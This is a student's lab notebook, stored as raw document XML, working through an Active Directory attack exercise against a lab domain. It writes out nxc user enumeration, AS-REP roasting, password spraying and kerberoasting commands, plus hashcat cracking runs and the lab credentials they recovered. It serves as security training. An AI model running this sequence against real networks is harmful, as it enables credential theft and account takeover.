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notes Lab 4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Tout d’abord, on commence par de la reconnaissance, on prend la température du domaine et on cherche des chemins d’accès sur la surface, on élimine les plus faciles.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731200" cy="25019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commande : nxc smb 10.10.10.10 -u '' -p '' --users</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">observation : on ne peut pas énumérer les utilisateur du domaine car nous sommes anonymes.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731200" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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on tente de trouver des comptes kerberos valides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1200" cy="2489200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23"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731200" cy="2489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j’ai téléchargé </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GetNPUsers.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour pouvoir voir si un de mes users avait un compte pouvant être exploité dans le cadre d’un AS-REP-roast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9525" cy="9525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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9525" cy="9525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1320800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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identification de comptes de service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731200" cy="2654300"/>
            <wp:effectExtent b="0" l="0" r="0" t="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3z1vaq5abr15" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>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1. What would a generic 10-million-entry username list do, and what would it fail to find?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It could find some valid usernames if their naming conventions happened to be represented in the list, but it would create a lot of unnecessary noise and wasted requests. A targeted list derived from employee names, observed email formats, DNS hostnames, and the documented </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_&lt;application&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> naming convention is more efficient. A generic list can still miss accounts whose names follow organization-specific conventions that the list doesn't contain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Which two well-known accounts were not returned as valid, and why?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The likely intended answers are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guest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krbtgt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The KDC response table explains the distinction: an account that exists but is disabled can return </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KDC_ERR_CLIENT_REVOKED</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than the response Kerbrute treats as a valid username. Verify this against your raw output if it records the individual errors; the summary alone doesn't prove which response each account returned.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6500813" cy="689198"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18"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6500813" cy="689198"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> found some existing hashes thanks to NetExec and this command : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc ldap 10.10.10.10 -u valid_users.txt -p ‘’ –asreproast asrep.txt &amp;&amp; cat asrep.txt</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1524000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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1524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blindly cracking password has failed </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1422400"/>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1422400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> now it has worked, i think </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule</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Account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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svc_intranet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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CORP.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovered password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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intranet123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">18200 — AS-REP</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1473200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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now we finally see things with the command : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u svc_intranet -p 'intranet123' --pass-pol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this allows us to list the domain’s password policy rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2616200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> spraying was successful for 3 accounts with the password Summer2026: jdoe, msmith and sconnor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this was the successful command : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u spray_targets.txt -p 'Summer2026!' --continue-on-success</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this next manipulation uses kerberoasting to leak some accounts’ hashes, it uses this command : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc ldap 10.10.10.10 -u svc_intranet -p 'intranet123' --kerberoasting kerb.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Then, the goal is to crack one of these hashes using hashcat : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashcat -m 13100 kerb.txt -a 6 ctx.txt '?d?d?d?d'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb.txt being the saved hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1892300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22"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1892300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> another svc account’s password found </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30rqcv3id4f" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checkpoint 2 &amp; 3 — Findings Summary</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1. SPN accounts and Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I collected </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10 unique Kerberoastable hashes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kerb.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, confirmed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -c '^\$krb5tgs' kerb.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The hash output explicitly identifies </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; the other SPN account names should be listed from the remaining hash entries. The file contained 10 unique hashes with 10 unique salts.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2. Password cracking results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Hashcat mode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13100</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a contextual wordlist (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ctx.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and a four-digit numeric suffix (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-a 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), I recovered the password for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_backup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Backup2020</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cracked</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Hashcat reported </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5/10 hashes recovered overall</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 newly recovered during this run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; four had already been recovered in previous runs. The run exhausted its 1,100,000 candidates, so the remaining hashes resisted this particular attack. This does not prove that they are impossible to crack, only that this candidate strategy did not recover them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Separately, the password spray identified these valid credentials:</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jdoe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Summer2026!</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msmith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Summer2026!</w:t>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sconnor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Summer2026!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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Corp2026!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> round produced </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STATUS_LOGON_FAILURE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the accounts shown in the supplied output.</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3. Why cracking a TGS causes no failed logons</w:t>
      </w:r>
    </w:p>
